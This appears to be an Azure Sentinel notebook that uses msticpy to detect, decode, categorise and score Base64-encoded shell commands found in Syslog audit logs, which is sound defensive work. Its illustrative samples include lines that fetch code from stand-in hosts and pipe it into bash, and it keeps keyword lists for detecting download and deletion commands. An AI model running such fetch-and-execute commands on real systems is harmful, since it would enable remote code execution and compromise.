Notebook Version: 1.0
Python Version: Python 3.6 (including Python 3.6 - AzureML)
Required Packages: kqlmagic, msticpy, pandas, numpy, matplotlib, networkx, seaborn, datetime, ipywidgets, ipython, dnspython, folium, maxminddb_geolite2, BeautifulSoup
Platforms Supported:
Data Sources Required:
This notebook is a collection of tools for detecting malicious behavior when commands are Base64-encoded. It allows you to specify a workspace and time frame and will score and rank Base64 commands within those bounds.
It utilizes multiple data sources, primarily focusing on Azure Sentinel Syslog data augmented by telemetry from the MSTIC research branch of the AUOMS audit collection tool. Make sure to install this agent and connect your virtual machines to Azure Sentinel before using this notebook. For more on this, please see this blog post.
This notebook also uses data from GTFOBins, a list of Unix binaries that can be exploited by attackers. These bash commands are labeled with preliminary functions that can help an investigator better understand what a command does.
Finally, we use threat intelligence (TI) from AlienVault OTX, VirusTotal, and IBM XForce to highlight certain Base64 commands.
The next cell checks the Python and msticpy versions and initializes the notebook environment.
This should complete without errors. If you encounter errors or warnings, look at the following two notebooks:
If you are running in the Azure Sentinel Notebooks environment (Azure Notebooks or Azure ML) you can run live versions of these notebooks:
You may also need to do some additional configuration to successfully use functions such as Threat Intelligence service lookup and Geo IP lookup.
There are more details about this in the ConfiguringNotebookEnvironment notebook and in these documents:
If you are unfamiliar with Jupyter notebooks, or want a more in-depth setup reference, check out these resources:
from pathlib import Path
from IPython.display import display, HTML
REQ_PYTHON_VER = "3.6"
REQ_MSTICPY_VER = "1.0.0"
display(HTML("<h3>Starting Notebook setup...</h3>"))
if Path("./utils/nb_check.py").is_file():
    from utils.nb_check import check_versions
    check_versions(REQ_PYTHON_VER, REQ_MSTICPY_VER)
from msticpy.nbtools import nbinit
nbinit.init_notebook(namespace=globals());
Run the cells below to connect to your Log Analytics workspace. If you haven't already, fill in the relevant information in msticpyconfig.yaml. This file is found in the Azure Sentinel Notebooks folder that contains this notebook. There is more information on how to do this in the Notebook Setup section above. You may need to restart the kernel after editing it and rerun any cells you've already run to pick up the new information.
If you are unfamiliar with connecting to Log Analytics or want a more in-depth walkthrough, check out the Getting Started with Azure Sentinel Notebook.
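For reference, below is a minimal sketch of the workspace and TI-provider sections of msticpyconfig.yaml. The IDs and API key shown are placeholders, not working values; substitute your own.

```yaml
AzureSentinel:
  Workspaces:
    Default:
      WorkspaceId: "11111111-1111-1111-1111-111111111111"   # placeholder
      TenantId: "22222222-2222-2222-2222-222222222222"      # placeholder
TIProviders:
  OTX:
    Args:
      AuthKey: "your-otx-api-key"   # placeholder
    Primary: True
    Provider: "OTX"
```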
# See if we have an Azure Sentinel Workspace defined in our config file.
# If not, let the user specify Workspace and Tenant IDs
ws_config = WorkspaceConfig()
if not ws_config.config_loaded:
    ws_config.prompt_for_ws()
qry_prov = QueryProvider(data_environment="AzureSentinel")
print("done")
# Authenticate to Azure Sentinel workspace
qry_prov.connect(ws_config)
Run the cell below, then use the sliding bar that pops up to adjust the time frame in which you want the query to find Base64 commands.
query_times = nbwidgets.QueryTime(units='day',
max_before=20, max_after=1, before=3)
query_times.display()
The following cell queries Base64 commands from AUOMS_EXECVE events in your Log Analytics workspace during the given time frame (these logs are discussed in the blog post mentioned earlier). This is the data the rest of the notebook operates on. The query is written in KQL. If you would like to add information to the query results, you may do it here; note that the following cells rely on this output, so the original columns must still be projected.
If you prefer to use a different log (not AUOMS_EXECVE), you may write your own query, but you may then have to adjust values throughout the rest of the notebook to get the correct columns and data frames.
pd.options.display.html.use_mathjax = False
query = "Syslog" + f""" | where TimeGenerated between (datetime({query_times.start}) .. datetime({query_times.end})) """ + r"""
| parse SyslogMessage with "type=" EventType " audit(" * "): " EventData
| project TimeGenerated, EventType, Computer, EventData
| where EventType == "AUOMS_EXECVE"
| parse EventData with * "cmdline=" Cmdline " containerid=" containerid
| where Cmdline has "base64" and Cmdline has "echo"
| where Cmdline matches regex "^(.*)([A-Za-z0-9])(.*)$"
| parse kind=regex Cmdline with * "echo\\s*(-n\\s)?\\\\?[\"']?" cmdextract "\\\\?[\"']?[\\s\"'$]"
| extend cmdextract= trim_end(@"(\\?)(\'?)(\s?)(\|)(\s?)(.*)(base64)(.*)",cmdextract)
| extend DecodedCommand=base64_decode_tostring(cmdextract)
| project TimeGenerated, Computer, Cmdline, DecodedCommand
"""
print("Collecting base64 queries...")
b64_df = qry_prov.exec_query(query)
b64_df
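To sanity-check the decoding logic offline, the extraction the KQL performs can be approximated in plain Python. This is a simplified sketch: the regex below is not the exact KQL parse expression, and the sample command line is illustrative.

```python
import base64
import re

def extract_and_decode(cmdline):
    """Pull the echoed payload that is piped to base64 and decode it."""
    m = re.search(
        r"""echo\s+(?:-n\s+)?["']?([A-Za-z0-9+/=]+)["']?\s*\|\s*base64""",
        cmdline,
    )
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-8", errors="replace")
    except ValueError:  # not valid Base64 after all
        return None

# Build an illustrative command line and round-trip it
payload = base64.b64encode(b"wget http://example.com/x").decode()
cmd = f"echo '{payload}' | base64 -d | bash"
decoded = extract_and_decode(cmd)  # "wget http://example.com/x"
```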
We will categorize commands in two ways: this cell looks for commonly used commands we are aware of; the next section uses an open-source compilation (GTFOBins).
This cell categorizes each decoded Base64 command by functionality based on what bash commands are present in the decoded version. For example, commands with "wget" or "curl" in them are categorized as "Network connections/Downloading." Other categories include "File Manipulation", "Host Enumeration", and "File/Process deletion/killing."
This categorization is by no means exhaustive; feel free to add commands and categories to this basic set.
# Network connections/downloading (wget, curl, urllib.urlopen)
# File manipulation (chmod, chattr, touch, cp, mv, ln, sed, awk, echo)
# Host enumeration (uname, grep … /proc/cpuinfo)
# File/process deletion/killing (rm, pkill)
# Archive/compression programs (tar, zip, gzip, bzip2, lzma, xz)
import re

def categorize(cmds):
    """Tag each decoded command with functional categories based on the binaries it calls."""
    category_terms = {
        "network connections/downloading": ["wget", "curl", "urllib.urlopen"],
        "file manipulation": ["chmod", "chattr", "touch", "cp", "mv", "ln", "sed", "awk", "echo"],
        "host enumeration": ["uname", "grep", "/proc/cpuinfo"],
        "file/process deletion/killing": ["rm", "pkill"],
        "archive/compression programs": ["tar", "zip", "gzip", "bzip2", "lzma", "xz"],
    }
    ret = []
    for cmd in cmds:
        # Match on token boundaries so that e.g. "cp" does not match "/proc/cpuinfo"
        categories = [
            category
            for category, terms in category_terms.items()
            if any(re.search(r"(^|\W)" + re.escape(t) + r"(\W|$)", cmd) for t in terms)
        ]
        ret.append(categories)
    return ret
print("Categorizing commands...")
b64_df['Categories'] = categorize(b64_df['DecodedCommand'])
b64_df['Categories'] = b64_df['Categories'].apply(str) # For drop_duplicates to work
b64_df[["Computer", "DecodedCommand", "Categories"]].drop_duplicates()
This cell categorizes the commands based on GTFOBins. GTFOBins is a vetted collection of bash commands frequently exploited by attackers as well as a reference as to how those commands may be used. We are using it to find potentially exploited commands in the dataset and tag those with their corresponding functionalities.
Run the cell below to read about what each category means according to the GTFOBins website.
from requests import get
from bs4 import BeautifulSoup
# Get HTML content from GTFOBins Website
fn_url = 'https://gtfobins.github.io/functions/'
fn_response = get(fn_url)
fn_soup = BeautifulSoup(fn_response.text, 'html.parser')
function_names = fn_soup.find_all('dt', class_ = 'function-name')
function_descriptions = fn_soup.find_all('dd')
display(HTML("<h1>GTFOBins Functions</h1>"))
# Print function headings and descriptions
for name, desc in zip(function_names, function_descriptions):
    display(HTML(f"<b>{name.text}</b>: {desc.text}<br>"))
The following cell tags commands with GTFOBins bins and functions and displays the dataframe again for viewing. You may click on the links in the 'GTFO Bins' column for easy access to the GTFOBins website and more information.
# Get GTFOBins bins from the website and create a list
print("Getting GTFO Bins...")
url = 'https://gtfobins.github.io/'
response = get(url)
gtfo_soup = BeautifulSoup(response.text, 'html.parser')
gtfo_cmds = gtfo_soup.find_all('a', class_ = 'bin-name')
gtfobinsList = [cmd.text for cmd in gtfo_cmds]
# Get the GTFO functions corresponding to each bin
print("Getting GTFO Functions...")
binsFunctions = []
for b in gtfobinsList:
    bin_url = 'https://gtfobins.github.io/gtfobins/' + b
    bin_response = get(bin_url)
    bin_soup = BeautifulSoup(bin_response.text, 'html.parser')
    bin_fnnames = bin_soup.find_all('h2', class_='function-name')
    names = [n.text for n in bin_fnnames]
    binsFunctions.append(names)
# Create a dictionary where the keys are bins and the values are its functions
binsDict = dict(zip(gtfobinsList, binsFunctions))
# Return lists of bins and functions corresponding to each command
def getGtfoBins(cmds):
    retBins = []
    retFns = []
    for cmd in cmds:
        bins_matched = []
        fns_matched = set()
        for b in binsDict.keys():
            if b in cmd:
                bins_matched.append('<a href="https://gtfobins.github.io/gtfobins/' + b + '">' + b + '</a>')
                fns_matched.update(binsDict[b])
        retBins.append(bins_matched)
        retFns.append(fns_matched)
    return retBins, retFns
print("Tagging GTFOBins...")
GTFOResult = getGtfoBins(b64_df['DecodedCommand'])
print("Formatting result...")
b64_df['GTFO Bins'] = GTFOResult[0]
b64_df['GTFO Functions'] = GTFOResult[1]
b64_df['GTFO Bins'] = b64_df['GTFO Bins'].apply(str) # For drop_duplicates
b64_df['GTFO Functions'] = b64_df['GTFO Functions'].apply(str)
HTML(b64_df[[ 'GTFO Bins', 'GTFO Functions', 'Computer', 'DecodedCommand', 'Categories']].drop_duplicates().to_html(escape=False))
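The tagging logic above boils down to a substring match against the scraped bin-to-functions mapping. Here is a self-contained sketch using a hand-made sample of that mapping; the bins and function names shown are illustrative, not the scraped data.

```python
# Hypothetical sample of the scraped bin -> functions mapping (binsDict)
bins_dict = {
    "curl": ["file-download", "file-upload"],
    "vim": ["shell", "file-read"],
}

def tag_bins(cmd, bins):
    """Return the bins found in a command plus the union of their functions."""
    matched_bins = [b for b in bins if b in cmd]
    matched_fns = sorted({fn for b in matched_bins for fn in bins[b]})
    return matched_bins, matched_fns

bins, fns = tag_bins("curl http://example.com/x | bash", bins_dict)
# bins -> ["curl"]; fns -> ["file-download", "file-upload"]
```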
The following sections generate scores for each unique Base64 command based on criteria such as frequency of the command, severity of TI lookup results, and related commands run. Each score is added to the dataframe at the end, so you can view and rank each individually or by the aggregate score.
Scores are heuristic and are meant to help investigators highlight commands that are more likely to be malicious. They have no absolute mathematical meaning and are only comparable to each other: higher scores indicate commands more likely to be malicious.
The cell below creates a frequency score for each unique Base64 command by calculating (1 / number of times the command occurred in the workspace). It then adds a score calculated as (1 / number of distinct hosts the command occurred on). Both scores are divided by 2 for normalization.
This results in rarer commands getting higher scores.
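As a worked example of the formula above (a standalone sketch of the same arithmetic):

```python
def freq_score(command_count, total_hosts):
    """FreqScore = (1 / workspace count) / 2 + (1 / distinct host count) / 2."""
    return (1 / command_count) / 2 + (1 / total_hosts) / 2

# A command seen 4 times in the workspace across 2 hosts
score = freq_score(4, 2)  # 0.125 + 0.25 = 0.375
```

A command seen exactly once on a single host gets the maximum score of 1.0.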
# Calculate Frequency Scores for the given data frame column
def calcFreqScore(df):
    return 1 / df

def num_unique(col):
    return len(col.unique())
# Aggregate b64_df column
b64_analytics = b64_df[["TimeGenerated", "Computer", "DecodedCommand", "Categories", "GTFO Bins", "GTFO Functions"]].groupby("DecodedCommand").agg(
CommandCount=pd.NamedAgg(column="DecodedCommand", aggfunc="count"),
TotalHosts=pd.NamedAgg(column="Computer", aggfunc=num_unique),
Hostnames=pd.NamedAgg(column="Computer", aggfunc="unique"),
Categories= pd.NamedAgg(column="Categories", aggfunc="first"),
GTFOBins=pd.NamedAgg(column="GTFO Bins", aggfunc="first"),
GTFOFunctions=pd.NamedAgg(column="GTFO Functions", aggfunc="first"),
FirstSeen=pd.NamedAgg(column="TimeGenerated", aggfunc="min"),
LastSeen=pd.NamedAgg(column="TimeGenerated", aggfunc="max"),
).reset_index()
b64_analytics["FreqScore"] = calcFreqScore(b64_analytics["CommandCount"]) / 2
b64_analytics["FreqScore"] = b64_analytics["FreqScore"] + ((calcFreqScore(b64_analytics["TotalHosts"])) / 2)
b64_analytics["TotalScore"] = b64_analytics["FreqScore"]
# Display
display_cols = [
'TotalScore','FreqScore', 'DecodedCommand', 'CommandCount', 'TotalHosts',
'Hostnames', 'Categories', 'GTFOBins', 'GTFOFunctions', 'FirstSeen', 'LastSeen'
]
summary_df = (
    b64_analytics[display_cols].sort_values("TotalScore", ascending=False).reset_index(drop=True)
)
HTML(summary_df.to_html(escape=False))
The cell below extracts any IoCs from the decoded Base64 commands and adds them to the dataframe. It uses the MSTICpy IoC extraction features, which extract the following patterns:
If you want to look for an IoC pattern that is not included here, feel free to modify the MSTICpy class. See this link for more information.
ioc_extractor = IoCExtract()
ioc_df = ioc_extractor.extract(data=b64_analytics, columns=['DecodedCommand'])
if len(ioc_df):
    display(HTML("<h3>IoC patterns found in decoded commands.</h3>"))
    display(ioc_df)
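MSTICpy's IoCExtract implements the pattern matching used above. A minimal standalone approximation for two common IoC types looks like this; the regexes are simplified illustrations, not msticpy's actual patterns.

```python
import re

# Simplified illustrations of two IoC patterns (not msticpy's actual regexes)
IOC_PATTERNS = {
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "url": re.compile(r"""\bhttps?://[^\s'"]+""", re.IGNORECASE),
}

def extract_iocs(text):
    """Return (ioc_type, observable) pairs found in a decoded command."""
    found = []
    for ioc_type, pattern in IOC_PATTERNS.items():
        for match in pattern.findall(text):
            found.append((ioc_type, match))
    return found

iocs = extract_iocs("wget http://203.0.113.5/payload.sh -O /tmp/x")
```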
Load and run TILookup on the IoCs found. Make sure you configure msticpyconfig.yaml with the appropriate TI sources. Check out the document below if you need help with this process.
We highly encourage you to add TI sources, but if you don't have any (i.e. API keys from AlienVault OTX, IBM XForce, or VirusTotal) and don't want to make accounts, you can skip this section and go directly to Related Alerts Scoring below. In that case your rankings will be based exclusively on frequency scores and related alerts scoring.
The below code will print out your current TI Lookup configurations.
ti_lookup = TILookup()
ti_lookup.reload_providers()
if not ti_lookup.provider_status:
    md_warn("You have no TI providers configured, please see the documentation link above.")
Choose which providers you would like to use during the TI lookup. You will need these to be configured on msticpyconfig.yaml
. Additional directions given above in the Notebook Setup section.
providers = [t.split(' - ', 1)[0] for t in ti_lookup.provider_status]
providers_ss = nbwidgets.SelectSubset(
providers,
default_selected=['OTX', 'VirusTotal', 'XForce']
)
You can choose which IoCs you're interested in, or look up all of them for scoring. Scores will be based exclusively on the Severity column. The following cells will also print a TI dataframe with added information.
items = ioc_df["Observable"].values
ioc_ss = nbwidgets.SelectSubset(
    items,
    default_selected=list(items)
)
Run this cell to look up the selected IoCs above.
iocs_to_check = (ioc_df[ioc_df["Observable"].isin(ioc_ss.selected_items)]
[["IoCType", "Observable"]].drop_duplicates())
print("Looking up IoCs...")
ti_results = ti_lookup.lookup_iocs(data=iocs_to_check, obs_col="Observable", providers=providers_ss.selected_items)
ti_results
The following cell adds to each command's score using the most severe of the severity ratings returned by the providers. The more severe the IoCs found, the higher the score the command receives. Each unique IoC found adds to the score of that command.
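The scoring rule can be illustrated standalone: each unique IoC contributes the score of its most severe provider verdict, and the contributions are summed per command. A sketch using the same sev_scores weights as the cell below, with made-up verdicts:

```python
# Same severity weights as the cell below
sev_scores = {"information": 0, "low": 1, "medium": 1.5, "high": 3, "unknown": 1}

def command_sev_score(ioc_severities):
    """Sum, per unique IoC, the score of its most severe provider verdict."""
    total = 0.0
    for verdicts in ioc_severities:  # one list of provider verdicts per IoC
        for level in ("high", "medium", "low", "information"):
            if level in verdicts:
                total += sev_scores[level]
                break
        else:  # no provider returned a verdict
            total += sev_scores["unknown"]
    return total

# Two IoCs: one rated high by some provider, one rated low
score = command_sev_score([["high", "low"], ["low"]])  # 3 + 1 = 4.0
```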
# Define severity scores
sev_scores = {"information": 0, "low": 1, "medium": 1.5, "high": 3, "unknown":1}
# Calculate severity scores and add IoCs to the data frame
def calc_severity(cmds):
    ret_iocs = []
    ret_scores = []
    for c in cmds:
        c_iocs = set()
        c_sev_score = []
        for ioc in ioc_df['Observable']:
            if ioc in c:
                c_iocs.add(ioc)
        for uniq_ioc in c_iocs:
            sev_df = ti_results[ti_results['Ioc'].values == uniq_ioc]
            # Collect severities for the selected providers
            az_sev = ""
            otx_sev = ""
            vt_sev = ""
            xf_sev = ""
            if 'AzSTI' in providers_ss.selected_items:
                az_sev = str(sev_df[sev_df['Provider'] == 'AzSTI']['Severity'])
            if 'OTX' in providers_ss.selected_items:
                otx_sev = str(sev_df[sev_df['Provider'] == 'OTX']['Severity'])
            if 'VirusTotal' in providers_ss.selected_items:
                vt_sev = str(sev_df[sev_df['Provider'] == 'VirusTotal']['Severity'])
            if 'XForce' in providers_ss.selected_items:
                xf_sev = str(sev_df[sev_df['Provider'] == 'XForce']['Severity'])
            # Score each IoC by its most severe provider verdict
            if 'high' in az_sev or 'high' in otx_sev or 'high' in vt_sev or 'high' in xf_sev:
                c_sev_score.append(sev_scores['high'])
            elif 'medium' in az_sev or 'medium' in otx_sev or 'medium' in vt_sev or 'medium' in xf_sev:
                c_sev_score.append(sev_scores['medium'])
            elif 'low' in az_sev or 'low' in otx_sev or 'low' in vt_sev or 'low' in xf_sev:
                c_sev_score.append(sev_scores['low'])
            elif 'info' in az_sev or 'info' in otx_sev or 'info' in vt_sev or 'info' in xf_sev:
                c_sev_score.append(sev_scores['information'])
            else:
                c_sev_score.append(sev_scores['unknown'])
        ret_iocs.append(c_iocs)
        ret_scores.append(sum(c_sev_score))
    return ret_iocs, ret_scores
ti_info = calc_severity(b64_analytics['DecodedCommand'])
b64_analytics['IoCsFound'] = ti_info[0]
b64_analytics['SevScore'] = ti_info[1]
b64_analytics['TotalScore'] += b64_analytics['SevScore']
display_cols = [
'TotalScore','SevScore','FreqScore', 'DecodedCommand', 'CommandCount', 'TotalHosts',
'Hostnames', 'Categories', 'GTFOBins', 'GTFOFunctions', 'FirstSeen', 'LastSeen'
]
summary_df = (
    b64_analytics[display_cols].sort_values("TotalScore", ascending=False).reset_index(drop=True)
)
HTML(summary_df.to_html(escape=False))
This section searches for any related Sentinel alerts on the hosts we've found Base64 commands on in the given time frame.
ra_query_times = nbwidgets.QueryTime(
units="day",
origin_time=query_times.origin_time,
max_before=28,
max_after=5,
before=5,
auto_display=True,
)
Points are added to the score depending on the severity of the alerts that occurred at this time. For example, high severity alerts around the Base64 commands will result in a higher score for those commands. Each unique alert's score is only added once. Alert information as well as timeline visualizations will also be printed out to provide context and enable further investigation. Be sure to scroll for information on all the hosts.
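As a worked example of the alert scoring (the same alert_scores mapping as the cell below, with made-up alerts):

```python
# Same alert severity weights as the cell below
alert_scores = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3}

def host_alert_score(unique_alert_severities):
    """Sum the weight of each unique alert seen on a host (counted once each)."""
    return sum(alert_scores[sev] for sev in unique_alert_severities)

# A host with one High and one Medium alert in the time window
score = host_alert_score(["High", "Medium"])  # 3 + 2 = 5
```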
# Define alert scores
alert_scores = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3}
# Create list of hosts to search for related alerts on
host_df = b64_df.groupby('Computer')
hosts = [h for h in host_df.groups]
def print_related_alerts(alertDict, entityType, entityName, df):
    if len(alertDict) > 0:
        display(
            Markdown(
                f"### Found {len(alertDict)} different alert types related to this {entityType} (`{entityName}`)"
            )
        )
        for (k, v) in alertDict.items():
            print(f"- {k}, # Alerts: {v}")
        display(df)
    else:
        print(f"No alerts for {entityType} entity `{entityName}`")
host_alert_scores = {}
for host in hosts:
    alerts_found = []
    related_alerts = qry_prov.SecurityAlert.list_related_alerts(
        ra_query_times, host_name=host
    )
    if isinstance(related_alerts, pd.DataFrame) and not related_alerts.empty:
        host_alert_items = (
            related_alerts[["AlertName", "TimeGenerated"]]
            .groupby("AlertName")
            .TimeGenerated.agg("count")
            .to_dict()
        )
        # Print related alerts in shorthand format
        print_related_alerts(host_alert_items, "host", host, related_alerts)
        if len(host_alert_items) > 1:
            nbdisplay.display_timeline(
                data=related_alerts, title="Alerts", source_columns=["AlertName"], height=200
            )
        # Add to alert scoring based on the severity of the found alerts.
        # Each unique alert only counts once.
        uniq_alerts_found = set(related_alerts['AlertName'].values)
        for a in uniq_alerts_found:
            sev = related_alerts[related_alerts['AlertName'] == a]['Severity'].values[0]
            alerts_found.append(alert_scores[sev])
    else:
        display(Markdown(f"No related alerts found for host `{host}`."))
    # Key the score by host name so each command can look up exactly its hosts
    host_alert_scores[host] = sum(alerts_found)
# Sum the alert scores of the hosts each command was seen on
b64_analytics['AlertScore'] = [
    sum(host_alert_scores.get(h, 0) for h in hostnames)
    for hostnames in b64_analytics['Hostnames']
]
b64_analytics['TotalScore'] += b64_analytics['AlertScore']
View the score again by running the cell below.
# If no TI Scores, add 0 as TI Score for each row
has_ti_scores = True
if 'SevScore' not in b64_analytics.keys():
    b64_analytics['SevScore'] = 0
    has_ti_scores = False
display_cols = [
'TotalScore','AlertScore', 'SevScore', 'FreqScore', 'DecodedCommand', 'CommandCount', 'TotalHosts',
'Hostnames', 'Categories', 'GTFOBins', 'GTFOFunctions', 'FirstSeen', 'LastSeen'
]
summary_df = (
    b64_analytics[display_cols].sort_values("TotalScore", ascending=False).reset_index(drop=True)
)
HTML(summary_df.to_html(escape=False))
Run the cell below to choose the columns you would like to view. You must select TotalScore for rankings to work.
column_names = b64_analytics.columns.values.tolist()
columns_included = nbwidgets.SelectSubset(
column_names,
default_selected=['TotalScore', 'FreqScore', 'AlertScore', 'SevScore', 'DecodedCommand', 'Categories']
)
Run this cell to display the columns you chose above. Score columns are shaded red in proportion to each score's share of the total, so you can see how each type of score contributes and compare compositions across commands.
You can also choose to only view data with numerical columns over a given cutoff by selecting a column and choosing a cutoff point.
import ipywidgets as widgets
from ipywidgets import interact, interact_manual
# Get score colums and numerical columns to display
score_cols = ['TotalScore', 'FreqScore', 'SevScore', 'AlertScore']
numerical_cols = ['TotalScore', 'FreqScore', 'SevScore', 'AlertScore', 'CommandCount', 'TotalHosts']
display_cols = [col for col in columns_included.selected_items if col in numerical_cols]
subset_cols = [col for col in columns_included.selected_items if col in score_cols]
# Get all display columns in order
ordered_cols = ['TotalScore', 'FreqScore', 'SevScore', 'AlertScore', 'DecodedCommand', 'Categories', 'CommandCount', 'FirstSeen', 'LastSeen', 'TotalHosts']
final_cols = ordered_cols.copy()
for col in ordered_cols:
    if col not in columns_included.selected_items:
        final_cols.remove(col)
@interact(Column=display_cols)
def show_articles_more_than(Column='TotalScore',
                            Cutoff=(0, max(b64_analytics['TotalScore']), 0.1)):
    return b64_analytics[final_cols].sort_values('TotalScore', ascending=False).loc[b64_analytics[Column] > Cutoff].style.bar(subset=subset_cols, color="#d65f5f")
You can use the following bar chart to view the compositions of the scores in a visual manner. The horizontal axis represents the index of the command in the data frame, so you can reference the data frame above for context around any interesting data you see.
import matplotlib.pyplot as plt
fig, ax = plt.subplots(figsize=(12,10))
plt.xlabel('Index')
plt.ylabel('TotalScore')
b64_analytics[['FreqScore', 'SevScore', 'AlertScore']].plot(ax=ax, kind='bar', stacked=True)
plt.show()
This timeline visualizes when commands occurred to identify potential windows of activity.
nbdisplay.display_timeline(data=b64_df, source_columns=['DecodedCommand', 'Categories'])